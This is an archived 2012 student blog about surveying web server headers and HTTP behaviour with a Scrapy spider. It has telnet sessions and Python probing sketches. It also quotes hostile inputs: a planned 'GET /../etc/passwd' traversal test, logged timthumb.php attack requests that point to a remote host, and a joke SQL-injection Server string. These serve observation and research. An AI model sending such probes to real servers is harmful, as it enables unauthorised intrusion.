Or looking for known, fixed vulnerabilities on servers that should know better (and several that shouldn't)
 

Archive for October, 2012


First Steps

October 20th, 2012 by Tad

So we now have a primitive spider working!  You can see our code, which uses the Scrapy toolkit, at https://github.com/tbook/comp527-serversurvey.  It's pretty ugly at this point, but hopefully we will have something nice by the end of the semester.

We made an initial attempt to crawl the Alexa top 500 and gather some basic data from the server headers.  You can see a survey of our initial results here.

Discovering all of the interesting headers sent back by the servers we encountered prompted a slight change in our methodology: we will log all server headers, which will let us assemble a fairly complete directory of the headers in use and then use them to classify servers.  We will also examine the Date headers to survey how many servers have the date correctly configured.  A sketch of what the header logging might look like follows.
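Here is a minimal sketch of such a header-logging spider in Scrapy.  The class name, seed URLs, and output fields are illustrative choices for this post, not the actual code in our repository:

# Minimal Scrapy spider that records every response header it sees.
import scrapy

class HeaderSurveySpider(scrapy.Spider):
    name = "header_survey"
    # Two seed URLs stand in for the full Alexa top-500 list.
    start_urls = ["http://www.rice.edu/", "http://www.example.com/"]

    def parse(self, response):
        # response.headers maps raw header names to lists of raw values.
        headers = {
            name.decode("latin-1"): [v.decode("latin-1") for v in values]
            for name, values in response.headers.items()
        }
        yield {
            "url": response.url,
            "status": response.status,
            "headers": headers,                               # the full directory
            "server": headers.get("Server", ["unknown"])[0],  # for classification
            "date": headers.get("Date", [None])[0],           # for the date survey
        }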

Some initial insights:

  • It seems that many servers are (understandably) guarded about sharing version information.  Many don’t give a version number, and some don’t even share the name of the server software.  Several return the helpful string “server” or “confidential”.
  • There is quite a variety of servers “in the wild.”  Apache has the largest share, but we observed the following other servers, as well: aris, BWS, GSE, gws, IBM, lighttpd, Microsoft-IIS, nginx, Netscape, PWS, Sun-Java-System-Web-Server, Tengine, and others.
  • Reddit.com seems to be trying a SQL exploit.  Their server string is: “'; DROP TABLE servertypes; --”
  • Roughly 3/4 of servers provide charset information, which varies widely: UTF-8 is the most common, but ISO-8859-1, GB2312, GBK, windows-1251, windows-1256, EUC-JP, EUC-KR, Shift_JIS, and Big5 also appear.  gsmarena.com uses “None” for its charset, apparently giving you the freedom to interpret their content in the way that you find personally most satisfying.  (A simple way to pull the charset out of the Content-Type header is sketched below.)
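Pulling the charset out of a Content-Type value is simple enough.  Here is a hypothetical helper (the function name is ours):

# Extract the charset parameter from a Content-Type header value such
# as "text/html; charset=UTF-8"; returns None when no charset is given.
def charset_of(content_type):
    for part in content_type.split(";")[1:]:
        key, _, value = part.strip().partition("=")
        if key.lower() == "charset":
            return value.strip('"') or None
    return None

assert charset_of("text/html; charset=UTF-8") == "UTF-8"
assert charset_of('text/plain; charset="iso-8859-1"') == "iso-8859-1"
assert charset_of("text/html") is None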

That’s where we are right now.  Look for more updates in the coming weeks!

The HTTP Protocol

October 10th, 2012 by Tad

I have been looking over version 1.1 of the HTTP protocol (http://www.w3.org/Protocols/rfc2616/rfc2616.html) to get a sense of what parameters we should measure.  The first thing I observed is that the data the server sends back depends on how we make the request.  Here are some examples from the Rice web server:

With no protocol specified, no headers are returned:

tbook@Athanasius:~$ telnet www.rice.edu 80
Trying 128.42.204.11...
Connected to www.netfu.rice.edu.
Escape character is '^]'.
GET /robots.txt
# Robot-exclusion file for chico.

With HTTP/1.0, we get a variety of headers:

GET /robots.txt HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 19:30:51 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

With HTTP/1.1, we get an error on our incomplete request, as expected, since HTTP/1.1 requires a Host header:

GET /robots.txt HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Wed, 10 Oct 2012 19:31:59 GMT
Server: Apache/2.2.12 (Unix)
Vary: Accept-Encoding
Content-Length: 226
Cneonction: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

If we give a complete request, we receive (nearly) the same headers:

telnet> toggle crlf
Will send carriage returns as telnet <CR><LF>.
telnet> open www.rice.edu 80
Trying 128.42.204.11...
Connected to www.netfu.rice.edu.
Escape character is '^]'.
GET /robots.txt HTTP/1.1
User-Agent: Telnet
Host: www.rice.edu
Accept: text/html
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 20:04:41 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

The Accept field seems to be ignored; the server returns text/plain even though we only accepted text/html:

GET /robots.txt HTTP/1.0
Accept: text/html
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 19:44:00 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

Other parts of the protocol seem not to be implemented; a bare OPTIONS request just produces an error page:

Connected to www.netfu.rice.edu.
Escape character is '^]'.
OPTIONS
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Server error!</title>
...
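The same experiments are easy to reproduce programmatically.  Here is a sketch using a raw socket; the host and path are the ones from the transcripts above, and the helper name is ours:

# Send a raw HTTP request over a plain socket and print the response
# headers, mirroring the telnet sessions above.
import socket

def raw_request(host, request_lines, port=80):
    # HTTP lines end in CRLF, and a blank line terminates the headers.
    payload = "\r\n".join(request_lines) + "\r\n\r\n"
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(payload.encode("ascii"))
        response = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            response += chunk
    head, _, _ = response.partition(b"\r\n\r\n")
    return head.decode("latin-1")

# A complete HTTP/1.1 request; without the Host header we would get
# the 400 Bad Request shown earlier.
print(raw_request("www.rice.edu", [
    "GET /robots.txt HTTP/1.1",
    "Host: www.rice.edu",
    "Connection: close",
]))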

Here is an initial list of some things we may want to test:

  • HTTP Version
  • Content type
  • Character set
  • Partial and conditional GETs (see the sketch after this list)
  • Accept
  • Expect
  • TE (Transfer Encoding request)
  • Upgrade
  • HTTP GET / HEAD / OPTIONS / TRACE
  • Responses of servers to various malformed requests (both HTTP/1.0 and 1.1)
  • Behavior when a relative URL is requested, e.g. GET /../etc/passwd
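As a taste of what the conditional and partial GET tests might look like, here is a sketch using only the standard library; the If-Modified-Since value is the Last-Modified date the Rice server reported above:

# Probe conditional and partial GET support.
import http.client

# Conditional GET: a server that honors If-Modified-Since returns 304.
conn = http.client.HTTPConnection("www.rice.edu", 80, timeout=10)
conn.request("GET", "/robots.txt",
             headers={"If-Modified-Since": "Thu, 27 May 2004 16:39:15 GMT"})
print("conditional GET:", conn.getresponse().status)  # 304 if supported
conn.close()

# Partial GET: a server that honors Range returns 206 Partial Content.
conn = http.client.HTTPConnection("www.rice.edu", 80, timeout=10)
conn.request("GET", "/robots.txt", headers={"Range": "bytes=0-99"})
resp = conn.getresponse()
print("partial GET:", resp.status, resp.getheader("Content-Range"))
conn.close()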

Other things would be interesting to test, but are probably impractical, as they would require knowing a path to a resource of the appropriate type (which may not exist on the server):

  • Content Coding
  • Transfer Coding
  • HTTP PUT / POST / DELETE (an OPTIONS request can at least hint at which methods a server supports; see the sketch below)
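A low-risk stand-in for the method tests is a well-formed OPTIONS request, since many servers advertise the methods they accept in the Allow header.  A sketch:

# Ask the server which methods it allows; many servers answer with an
# Allow header even where PUT or DELETE would be refused.
import http.client

conn = http.client.HTTPConnection("www.rice.edu", 80, timeout=10)
conn.request("OPTIONS", "/robots.txt")
resp = conn.getresponse()
print(resp.status, resp.getheader("Allow"))
conn.close()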


Some Historical Data

October 10th, 2012 by Tad

I recently came across some historical data on server versions and updates that may be useful for our project.  In a survey of drive-by downloads (Niels Provos, Panayiotis Mavrommatis, Moheeb Rajab, and Fabian Monrose, “All Your iFrames Point to Us,” 17th USENIX Security Symposium, San Jose, CA, August 2008), the authors included the following data on some servers as of mid-2008:

Server software   Count     Unknown   Up-to-date   Old
Apache            55,088    26.5%     35.5%        38%
Microsoft IIS     113,905   n/a       n/a          n/a
Unknown           12,706    n/a       n/a          n/a

This data covers only servers that served as landing sites for malware distribution, so it can’t be taken as representative of servers of the period.  Still, it does provide a snapshot of the servers that were open to exploits at the time.

We aren’t the only ones surveying web servers!

October 8th, 2012 by Tad

Today I had an interesting reminder that we are not the only ones surveying web servers.  I was looking at the server logs for librivox.bookdesign.biz, a server that provides a web interface to the database I use for my LibriVox AudioBooks Android app.  As it turns out, a few interesting requests had produced 404 errors:

184.107.145.18 - - [05/Oct/2012:08:42:27 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/idss.php HTTP/1.1"
404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=3 cpu_ms=0
184.107.145.18 - - [05/Oct/2012:08:42:25 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/petx.php HTTP/1.1"
404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=4 cpu_ms=0 
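Probes like these are easy to pick out of a combined-format access log.  A quick, illustrative scan (the log file name is hypothetical):

# Report the source address and target of every timthumb.php probe.
import re

probe = re.compile(r'"(?:GET|POST) (\S*timthumb\.php\S*)')

with open("access.log") as log:
    for line in log:
        match = probe.search(line)
        if match:
            ip = line.split()[0]  # the client address is the first field
            print(ip, match.group(1))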

As it turns out, timthumb.php is a WordPress image-resizing utility with a security vulnerability that allows arbitrary file uploads.  You can read about the weakness on the Sucuri blog.  Of course, it’s no surprise that malicious agents are surveying web servers for vulnerabilities; it’s just interesting to see it happening in practice.  Had my server used the offending library, I could now be hosting drive-by downloads for some botnet.

I didn’t take the time to thoroughly investigate 184.107.145.18 or arztree.com (the IP address points to a server hosted by iweb.com in Canada, and the domain is registered in Taiwan), as I think it is safe to assume that any potential attacker’s trail is well covered.  Still, the probing is a reminder that our survey will, in some ways, mirror the efforts of various agents looking for weaknesses in web infrastructure.